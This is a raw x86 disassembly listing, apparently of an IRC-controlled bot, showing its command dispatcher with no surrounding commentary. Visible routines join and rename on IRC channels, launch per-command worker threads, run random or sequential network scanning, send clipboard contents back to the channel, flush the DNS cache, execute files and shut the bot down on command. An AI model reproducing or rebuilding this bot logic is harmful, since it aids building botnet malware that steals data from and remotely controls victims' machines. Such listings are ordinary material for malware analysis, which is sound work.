push ebx
call dword_43C998 ; ShellExecuteA
test eax, eax
push edi
jz short loc_41158E
push offset unk_4344BC
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_41158E: ; CODE XREF: sub_40CD3A+4848�j
push offset unk_434484
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_411598: ; CODE XREF: sub_40CD3A+18D7�j
; sub_40CD3A+18EE�j
mov al, [edi]
mov byte_42C258, al
movsx eax, byte ptr [edi]
push eax
push offset dword_43444C
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_4115AD: ; CODE XREF: sub_40CD3A+18A9�j
; sub_40CD3A+18C0�j
push edi
call sub_41587F
test eax, eax
pop ecx
jle loc_412818
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_412818
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_414278
push eax
lea eax, [ebp+var_2D8]
push offset dword_434B64
push eax
call sub_415316
add esp, 1Ch
jmp loc_410CD0
; ---------------------------------------------------------------------------
loc_4115F8: ; CODE XREF: sub_40CD3A+187B�j
; sub_40CD3A+1892�j
push edi
call sub_41587F
test eax, eax
pop ecx
jle loc_40D18F
push edi
call sub_41587F
cmp eax, 12Ch
pop ecx
jge loc_40D18F
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call sub_412B8B
pop ecx
pop ecx
push 1F4h
call dword_421060 ; Sleep
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BA4[eax]
call dword_43CABC ; closesocket
push [ebp+var_10]
push edi
call sub_41587F
imul eax, 234h
pop ecx
push dword_441BAC[eax]
call dword_421130 ; TerminateThread
push edi
call sub_41587F
imul eax, 234h
push edi
mov dword_441BAC[eax], ebx
call sub_41587F
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_441998[eax], bl
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_4116A3: ; CODE XREF: sub_40CD3A+184D�j
; sub_40CD3A+1864�j
push edi
push offset aAll ; "all"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_4116D2
call sub_414F9D
cmp eax, ebx
jle short loc_4116C8
push eax
push offset dword_4343FC
jmp loc_40F5C3
; ---------------------------------------------------------------------------
loc_4116C8: ; CODE XREF: sub_40CD3A+4981�j
push offset dword_4343C0
jmp loc_411EB9
; ---------------------------------------------------------------------------
loc_4116D2: ; CODE XREF: sub_40CD3A+4978�j
mov eax, [ebp+var_A8]
lea esi, [eax+1]
jmp short loc_411749
; ---------------------------------------------------------------------------
loc_4116DD: ; CODE XREF: sub_40CD3A+4A12�j
mov edi, [ebp+esi*4+var_94]
cmp edi, ebx
jz loc_40D18F
push edi
call sub_41587F
push eax
call sub_414F15
pop ecx
pop ecx
test eax, eax
push edi
lea eax, [ebp+var_2D8]
jz short loc_41170C
push offset dword_434388
jmp short loc_411711
; ---------------------------------------------------------------------------
loc_41170C: ; CODE XREF: sub_40CD3A+49C9�j
push offset dword_434348
loc_411711: ; CODE XREF: sub_40CD3A+49D0�j
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_41173B
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_41173B: ; CODE XREF: sub_40CD3A+49E3�j
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
pop ecx
inc esi
loc_411749: ; CODE XREF: sub_40CD3A+49A1�j
cmp esi, 20h
jb short loc_4116DD
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_411753: ; CODE XREF: sub_40CD3A+181F�j
; sub_40CD3A+1836�j
cmp [ebp+var_C], ebx
jz loc_412818
push edi
push [ebp+var_C]
call sub_4158E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_412818
push esi
push offset dword_425090
push [ebp+arg_4]
call sub_412B8B
push esi
push offset dword_43431C
jmp short loc_4117D1
; ---------------------------------------------------------------------------
loc_411787: ; CODE XREF: sub_40CD3A+17F1�j
; sub_40CD3A+1808�j
push edi
push offset dword_434A84
push [ebp+arg_4]
call sub_412B8B
push edi
push offset dword_4342E8
jmp short loc_4117D1
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: sub_40CD3A+17C3�j
; sub_40CD3A+17DA�j
push [ebp+esi+var_8C]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_412B8B
push edi
push offset dword_4342B4
jmp loc_410D83
; ---------------------------------------------------------------------------
loc_4117BD: ; CODE XREF: sub_40CD3A+1795�j
; sub_40CD3A+17AC�j
push edi
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_412B8B
push edi
push offset dword_43427C
loc_4117D1: ; CODE XREF: sub_40CD3A+4172�j
; sub_40CD3A+4A4B�j ...
call sub_40B0EC
loc_4117D6: ; CODE XREF: sub_40CD3A+41D8�j
add esp, 14h
jmp loc_412818
; ---------------------------------------------------------------------------
loc_4117DE: ; CODE XREF: sub_40CD3A+175A�j
; sub_40CD3A+176F�j
mov al, byte_4276EE
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_4276EE
jz loc_40D18F
mov ecx, edx
loc_4117F5: ; CODE XREF: sub_40CD3A+4AC3�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4117F5
cmp al, bl
jz loc_40D18F
mov [ebp+arg_18], edx
loc_41180A: ; CODE XREF: sub_40CD3A+4D7C�j
push 8
call sub_41501C
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 12Ch
jle short loc_411859
push ecx
lea eax, [ebp+var_2D8]
push offset dword_435460
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 20h
jmp loc_411AAD
; ---------------------------------------------------------------------------
loc_411859: ; CODE XREF: sub_40CD3A+4AEA�j
or [ebp+var_458], 0FFFFFFFFh
cmp dword_427388, ebx
mov [ebp+var_45C], 1Eh
mov [ebp+var_470], 7
mov [ebp+var_46C], 0B4h
mov [ebp+arg_0], ebx
jz short loc_4118CA
mov eax, [ebp+arg_18]
mov edi, offset dword_427388
lea esi, [eax-0Ah]
loc_411894: ; CODE XREF: sub_40CD3A+4B72�j
lea eax, [edi-28h]
push esi
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_4118B0
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_411894
jmp short loc_4118CA
; ---------------------------------------------------------------------------
loc_4118B0: ; CODE XREF: sub_40CD3A+4B68�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_458], eax
imul ecx, 3Ch
mov ecx, dword_427388[ecx]
mov [ebp+var_474], ecx
loc_4118CA: ; CODE XREF: sub_40CD3A+4B4D�j
; sub_40CD3A+4B74�j
cmp [ebp+var_474], ebx
jz loc_411AD3
push 10h
lea eax, [ebp+arg_10]
pop esi
push eax
lea eax, [ebp+var_D0]
push eax
mov [ebp+arg_10], esi
push [ebp+arg_4]
call dword_43C9C8 ; getsockname
mov al, [ebp+var_8FF]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_CC], eax
push [ebp+var_CC]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_588]
push eax
call sub_416BE0
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_588]
push eax
call sub_416EE0
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_41196C
loc_41194A: ; CODE XREF: sub_40CD3A+4C30�j
cmp eax, ebx
jz short loc_41196C
mov byte ptr [eax], 78h
lea eax, [ebp+var_588]
push 30h
push eax
call sub_416EE0
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_41194A
loc_41196C: ; CODE XREF: sub_40CD3A+4C0E�j
; sub_40CD3A+4C12�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov esi, [ebp+var_4]
mov [ebp+var_478], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_44C], eax
lea eax, [ebp+var_578]
push eax
mov [ebp+var_448], 1
mov [ebp+var_450], esi
call sub_41588A
mov edi, offset dword_42C300
push offset byte_43B658
push edi
call sub_415730
add esp, 14h
test eax, eax
jz short loc_4119D6
push edi
lea eax, [ebp+var_4F8]
push 80h
push eax
call sub_41588A
add esp, 0Ch
jmp short loc_4119DC
; ---------------------------------------------------------------------------
loc_4119D6: ; CODE XREF: sub_40CD3A+4C83�j
mov [ebp+var_4F8], bl
loc_4119DC: ; CODE XREF: sub_40CD3A+4C9A�j
cmp [ebp+var_448], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_4119EE
mov eax, offset aSequential ; "Sequential"
loc_4119EE: ; CODE XREF: sub_40CD3A+4CAD�j
push [ebp+var_45C]
lea ecx, [ebp+var_588]
push [ebp+var_46C]
push [ebp+var_470]
push [ebp+var_474]
push ecx
push eax
lea eax, [ebp+var_2D8]
push offset dword_434200
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 8
push eax
call sub_414DDA
add esp, 2Ch
mov [ebp+var_468], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_588]
push ebx
push eax
push offset sub_4078DF
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_468]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_411AC9
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D8]
push offset dword_435330
push eax
call sub_415316
add esp, 0Ch
loc_411A81: ; CODE XREF: sub_40CD3A+4D97�j
cmp [ebp+var_8], ebx
jnz short loc_411AA0
push ebx
lea eax, [ebp+var_2D8]
push esi
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_411AA0: ; CODE XREF: sub_40CD3A+4D4A�j
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
pop ecx
loc_411AAD: ; CODE XREF: sub_40CD3A+4B1A�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_41180A
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_411AC1: ; CODE XREF: sub_40CD3A+4D95�j
push 32h
call dword_421060 ; Sleep
loc_411AC9: ; CODE XREF: sub_40CD3A+4D2A�j
cmp [ebp+var_444], ebx
jz short loc_411AC1
jmp short loc_411A81
; ---------------------------------------------------------------------------
loc_411AD3: ; CODE XREF: sub_40CD3A+2F3F�j
; sub_40CD3A+4B96�j
push offset dword_4341B0
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_411ADD: ; CODE XREF: sub_40CD3A+1730�j
; sub_40CD3A+1745�j
push 4
call sub_41501C
test eax, eax
pop ecx
jle short loc_411AF3
push offset unk_43417C
jmp loc_40F8E8
; ---------------------------------------------------------------------------
loc_411AF3: ; CODE XREF: sub_40CD3A+4DAD�j
mov eax, [ebp+esi+var_90]
mov edi, 104h
cmp eax, ebx
jz short loc_411B16
push eax
lea eax, [ebp+var_1428]
push edi
push eax
call sub_41588A
add esp, 0Ch
jmp short loc_411B25
; ---------------------------------------------------------------------------
loc_411B16: ; CODE XREF: sub_40CD3A+4DC7�j
lea eax, [ebp+var_1428]
push edi
push eax
push ebx
call dword_42107C ; GetModuleFileNameA
loc_411B25: ; CODE XREF: sub_40CD3A+4DDA�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_411B35
mov esi, offset byte_42C2B4
loc_411B35: ; CODE XREF: sub_40CD3A+4DF4�j
push esi
lea eax, [ebp+var_1324]
push edi
push eax
call sub_41588A
mov eax, dword_42C244
push 7Fh
push [ebp+var_8C]
mov [ebp+var_1218], eax
mov eax, [ebp+arg_4]
mov [ebp+var_121C], ebx
mov [ebp+var_142C], eax
lea eax, [ebp+var_1214]
push eax
call sub_416BE0
mov eax, [ebp+var_4]
mov [ebp+var_1194], eax
mov eax, [ebp+var_8]
mov [ebp+var_1190], eax
lea eax, [ebp+var_1324]
push eax
lea eax, [ebp+var_1428]
push eax
lea eax, [ebp+var_2D8]
push [ebp+var_1218]
push offset unk_427948
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 4
push eax
call sub_414DDA
add esp, 38h
mov [ebp+var_1220], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_142C]
push ebx
push eax
push offset sub_406B84
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_1220]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_411C08
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_434130
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_411C00: ; CODE XREF: sub_40CD3A+4ED4�j
push 32h
call dword_421060 ; Sleep
loc_411C08: ; CODE XREF: sub_40CD3A+4EB3�j
cmp [ebp+var_118C], ebx
jz short loc_411C00
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_411C15: ; CODE XREF: sub_40CD3A+1706�j
; sub_40CD3A+171B�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_411C34
push edi
call sub_41587F
test eax, eax
pop ecx
jz short loc_411C34
push edi
call sub_41587F
pop ecx
jmp short loc_411C39
; ---------------------------------------------------------------------------
loc_411C34: ; CODE XREF: sub_40CD3A+4EE4�j
; sub_40CD3A+4EEF�j
mov eax, dword_42C248
loc_411C39: ; CODE XREF: sub_40CD3A+4EF8�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_B30], eax
xor eax, eax
cmp [ebp+var_8FC], bl
setz al
cmp esi, ebx
mov [ebp+var_B1C], eax
jz short loc_411C6C
lea eax, [ebp+var_C34]
push esi
push eax
call sub_415316
pop ecx
pop ecx
jmp short loc_411C97
; ---------------------------------------------------------------------------
loc_411C6C: ; CODE XREF: sub_40CD3A+4F1F�j
lea eax, [ebp+var_A80]
push 104h
push eax
call dword_421058 ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_CC]
push ebx
push eax
lea eax, [ebp+var_A80]
push eax
call sub_4171E8
add esp, 14h
loc_411C97: ; CODE XREF: sub_40CD3A+4F30�j
lea eax, [ebp+var_C34]
push eax
call sub_415B10
cmp [ebp+eax+var_C35], 5Ch
pop ecx
jnz short loc_411CC2
lea eax, [ebp+var_C34]
push eax
call sub_415B10
pop ecx
mov [ebp+eax+var_C35], bl
loc_411CC2: ; CODE XREF: sub_40CD3A+4F72�j
push [ebp+var_8C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_EBC]
mov [ebp+var_EC0], esi
push 80h
push eax
call sub_41588A
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_B20], eax
lea eax, [ebp+var_C34]
mov [ebp+var_B24], edi
push eax
push [ebp+var_B30]
push esi
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_2D8]
push offset unk_427810
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 3
push eax
call sub_414DDA
add esp, 20h
mov [ebp+var_B28], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_EC0]
push ebx
push eax
push offset sub_405A96
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_B28]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_411DA5
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_4340E0
loc_411D70: ; CODE XREF: sub_40CD3A+343F�j
; sub_40CD3A+3538�j
lea eax, [ebp+var_2D8]
push eax
call sub_415316
add esp, 0Ch
loc_411D7F: ; CODE XREF: sub_40CD3A+3454�j
; sub_40CD3A+354D�j ...
cmp [ebp+var_8], ebx
jnz loc_40D68B
push ebx
push edi
loc_411D8A: ; CODE XREF: sub_40CD3A+3887�j
lea eax, [ebp+var_2D8]
push eax
push [ebp+var_8C]
push esi
jmp loc_40F913
; ---------------------------------------------------------------------------
loc_411D9D: ; CODE XREF: sub_40CD3A+5071�j
push 32h
call dword_421060 ; Sleep
loc_411DA5: ; CODE XREF: sub_40CD3A+5028�j
cmp [ebp+var_B14], ebx
jz short loc_411D9D
jmp short loc_411D7F
; ---------------------------------------------------------------------------
loc_411DAF: ; CODE XREF: sub_40CD3A+16DC�j
; sub_40CD3A+16F1�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_411DC2
push esi
call sub_41587F
jmp short loc_411DC9
; ---------------------------------------------------------------------------
loc_411DC2: ; CODE XREF: sub_40CD3A+507E�j
push 8
call sub_41503B
loc_411DC9: ; CODE XREF: sub_40CD3A+5086�j
cmp eax, ebx
pop ecx
jz loc_412818
push eax
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40713F
jmp loc_41229A
; ---------------------------------------------------------------------------
loc_411DE9: ; CODE XREF: sub_40CD3A+16B2�j
; sub_40CD3A+16C7�j
mov eax, dword_43C94C
cmp eax, ebx
jz short loc_411E0C
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2D8]
jz short loc_411E05
push offset unk_4340A8
jmp short loc_411E2D
; ---------------------------------------------------------------------------
loc_411E05: ; CODE XREF: sub_40CD3A+50C2�j
push offset unk_434068
jmp short loc_411E2D
; ---------------------------------------------------------------------------
loc_411E0C: ; CODE XREF: sub_40CD3A+50B6�j
push offset unk_434028
lea eax, [ebp+var_2D8]
jmp short loc_411E2D
; ---------------------------------------------------------------------------
loc_411E19: ; CODE XREF: sub_40CD3A+1688�j
; sub_40CD3A+169D�j
call sub_409FB2
test eax, eax
lea eax, [ebp+var_2D8]
jz short loc_411E3D
push offset unk_433FF0
loc_411E2D: ; CODE XREF: sub_40CD3A+50C9�j
; sub_40CD3A+50D0�j ...
push 200h
push eax
call sub_41588A
jmp loc_40F523
; ---------------------------------------------------------------------------
loc_411E3D: ; CODE XREF: sub_40CD3A+50EC�j
push offset unk_433FB0
jmp short loc_411E2D
; ---------------------------------------------------------------------------
loc_411E44: ; CODE XREF: sub_40CD3A+165E�j
; sub_40CD3A+1673�j
cmp [ebp+var_8], ebx
jnz short loc_411E63
push ebx
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_411E63: ; CODE XREF: sub_40CD3A+510D�j
push ebx
push [ebp+var_4]
call sub_409BB1
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
push offset dword_433F6C
jmp loc_412167
; ---------------------------------------------------------------------------
loc_411E85: ; CODE XREF: sub_40CD3A+1584�j
; sub_40CD3A+1599�j
push 7
call sub_41501C
test eax, eax
pop ecx
jle short loc_411E98
push offset dword_433F30
jmp short loc_411EB9
; ---------------------------------------------------------------------------
loc_411E98: ; CODE XREF: sub_40CD3A+5155�j
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40A71A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_411EB4
push offset dword_433EF4
jmp short loc_411EB9
; ---------------------------------------------------------------------------
loc_411EB4: ; CODE XREF: sub_40CD3A+5171�j
push offset dword_433EC0
loc_411EB9: ; CODE XREF: sub_40CD3A+4993�j
; sub_40CD3A+515C�j ...
lea eax, [ebp+var_2D8]
push eax
call sub_415316
pop ecx
pop ecx
jmp loc_40F5D2
; ---------------------------------------------------------------------------
loc_411ECC: ; CODE XREF: sub_40CD3A+155A�j
; sub_40CD3A+156F�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_4095A9
jmp loc_412188
; ---------------------------------------------------------------------------
loc_411EE5: ; CODE XREF: sub_40CD3A+1530�j
; sub_40CD3A+1545�j
push [ebp+esi+var_90]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40C409
jmp loc_412188
; ---------------------------------------------------------------------------
loc_411F02: ; CODE XREF: sub_40CD3A+1506�j
; sub_40CD3A+151B�j
or edi, 0FFFFFFFFh
call dword_42104C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_411F2B
push esi
call sub_41587F
pop ecx
mov edi, eax
loc_411F2B: ; CODE XREF: sub_40CD3A+51E6�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_411F44
cmp edi, 0FFFFFFFFh
jnz loc_412818
loc_411F44: ; CODE XREF: sub_40CD3A+51FF�j
push ebx
call sub_40A8CF
push eax
lea eax, [ebp+var_2D8]
push offset dword_433E94
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
lea eax, [ebp+var_2D8]
push eax
call sub_40B078
loc_411F81: ; CODE XREF: sub_40CD3A+328D�j
add esp, 28h
jmp loc_412818
; ---------------------------------------------------------------------------
loc_411F89: ; CODE XREF: sub_40CD3A+14DC�j
; sub_40CD3A+14F1�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_408503
lea eax, [ebp+var_2D8]
push offset unk_433E60
push eax
call sub_415316
loc_411FAB: ; CODE XREF: sub_40CD3A+3AAA�j
add esp, 14h
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_411FB3: ; CODE XREF: sub_40CD3A+14B2�j
; sub_40CD3A+14C7�j
push 1Eh
call sub_41501C
test eax, eax
pop ecx
jle short loc_411FE7
cmp [ebp+var_8], ebx
jnz loc_40D18F
push ebx
push [ebp+var_4]
push offset dword_433E2C
push [ebp+var_8C]
loc_411FD7: ; CODE XREF: sub_40CD3A+8D9�j
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_411FE7: ; CODE XREF: sub_40CD3A+5283�j
push [ebp+var_8C]
lea eax, [ebp+var_36C]
push 80h
push eax
call sub_41588A
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_370], eax
mov eax, [ebp+var_4]
mov [ebp+var_2E4], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_2E0], eax
mov [ebp+var_2E8], ebx
jz short loc_412048
push esi
push offset aFull ; "full"
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_412048
mov [ebp+var_2E8], 1
loc_412048: ; CODE XREF: sub_40CD3A+52F1�j
; sub_40CD3A+5302�j
lea eax, [ebp+var_2D8]
push offset dword_433DF0
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 1Eh
push eax
call sub_414DDA
add esp, 14h
mov [ebp+var_2EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_370]
push ebx
push eax
push offset sub_413DFD
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_2EC]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4120C8
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D8]
push offset dword_433DA0
push eax
call sub_415316
add esp, 0Ch
jmp loc_40F5F3
; ---------------------------------------------------------------------------
loc_4120C0: ; CODE XREF: sub_40CD3A+5394�j
push 32h
call dword_421060 ; Sleep
loc_4120C8: ; CODE XREF: sub_40CD3A+5364�j
cmp [ebp+var_2DC], ebx
jz short loc_4120C0
jmp loc_40F5F3
; ---------------------------------------------------------------------------
loc_4120D5: ; CODE XREF: sub_40CD3A+1488�j
; sub_40CD3A+149D�j
cmp [ebp+var_8], ebx
jnz short loc_4120F4
push ebx
push [ebp+var_4]
push offset dword_433D70
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_4120F4: ; CODE XREF: sub_40CD3A+539E�j
push [ebp+arg_4]
call dword_43CABC ; closesocket
call dword_43C984 ; WSACleanup
call sub_409D34
push ebx
call dword_421114 ; ExitProcess
loc_41210F: ; CODE XREF: sub_40CD3A+145E�j
; sub_40CD3A+1473�j
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_40A9D8
pop ecx
pop ecx
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
push offset dword_433D44
jmp short loc_412167
; ---------------------------------------------------------------------------
loc_41213A: ; CODE XREF: sub_40CD3A+1434�j
; sub_40CD3A+1449�j
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40AC8C
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
push offset dword_433D18
loc_412167: ; CODE XREF: sub_40CD3A+5146�j
; sub_40CD3A+53FE�j
call sub_40B078
loc_41216C: ; CODE XREF: sub_40CD3A+404E�j
add esp, 18h
jmp loc_412818
; ---------------------------------------------------------------------------
loc_412174: ; CODE XREF: sub_40CD3A+140A�j
; sub_40CD3A+141F�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40B118
loc_412188: ; CODE XREF: sub_40CD3A+3A9�j
; sub_40CD3A+51A6�j ...
add esp, 10h
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_412190: ; CODE XREF: sub_40CD3A+13E0�j
; sub_40CD3A+13F5�j
cmp [ebp+var_C], ebx
mov [ebp+var_A0C], bl
jz short loc_4121CF
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_4121CF
push esi
push [ebp+var_C]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4121CF
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_A0C]
push 80h
push eax
call sub_41588A
add esp, 10h
loc_4121CF: ; CODE XREF: sub_40CD3A+545F�j
; sub_40CD3A+546A�j ...
push [ebp+var_8C]
lea eax, [ebp+var_A8C]
push 80h
push eax
call sub_41588A
mov eax, [ebp+arg_4]
push offset dword_433CEC
mov [ebp+var_A90], eax
mov eax, [ebp+var_4]
mov [ebp+var_988], eax
mov eax, [ebp+var_8]
mov [ebp+var_984], eax
lea eax, [ebp+var_2D8]
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 1Ch
push eax
call sub_414DDA
add esp, 20h
mov [ebp+var_98C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A90]
push ebx
push eax
push offset sub_40B18A
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_98C]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_412272
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_433CA0
jmp loc_412993
; ---------------------------------------------------------------------------
loc_41226A: ; CODE XREF: sub_40CD3A+553E�j
push 32h
call dword_421060 ; Sleep
loc_412272: ; CODE XREF: sub_40CD3A+551D�j
cmp [ebp+var_980], ebx
jz short loc_41226A
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_41227F: ; CODE XREF: sub_40CD3A+13B6�j
; sub_40CD3A+13CB�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40B000
push offset dword_433C70
call sub_40B078
loc_41229A: ; CODE XREF: sub_40CD3A+50AA�j
add esp, 10h
jmp loc_412818
; ---------------------------------------------------------------------------
loc_4122A2: ; CODE XREF: sub_40CD3A+138C�j
; sub_40CD3A+13A1�j
push [ebp+var_8C]
lea eax, [ebp+var_404]
push 80h
push eax
call sub_41588A
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_408], eax
mov eax, [ebp+var_4]
mov [ebp+var_37C], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_378], eax
jz short loc_4122FC
push offset dword_433C6C
push esi
call sub_415730
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_380], eax
jmp short loc_412302
; ---------------------------------------------------------------------------
loc_4122FC: ; CODE XREF: sub_40CD3A+55A6�j
mov [ebp+var_380], ebx
loc_412302: ; CODE XREF: sub_40CD3A+55C0�j
lea eax, [ebp+var_2D8]
push offset dword_433C3C
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 1Fh
push eax
call sub_414DDA
add esp, 14h
mov [ebp+var_384], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_408]
push ebx
push eax
push offset sub_414E45
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_384]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_412373
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_433BF0
jmp loc_411308
; ---------------------------------------------------------------------------
loc_41236B: ; CODE XREF: sub_40CD3A+563F�j
push 32h
call dword_421060 ; Sleep
loc_412373: ; CODE XREF: sub_40CD3A+561E�j
cmp [ebp+var_374], ebx
jz short loc_41236B
jmp loc_40F547
; ---------------------------------------------------------------------------
loc_412380: ; CODE XREF: sub_40CD3A+1310�j
; sub_40CD3A+1325�j
push offset aIds99 ; "ids99"
lea eax, [ebp+var_2D8]
push offset dword_433BC4
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
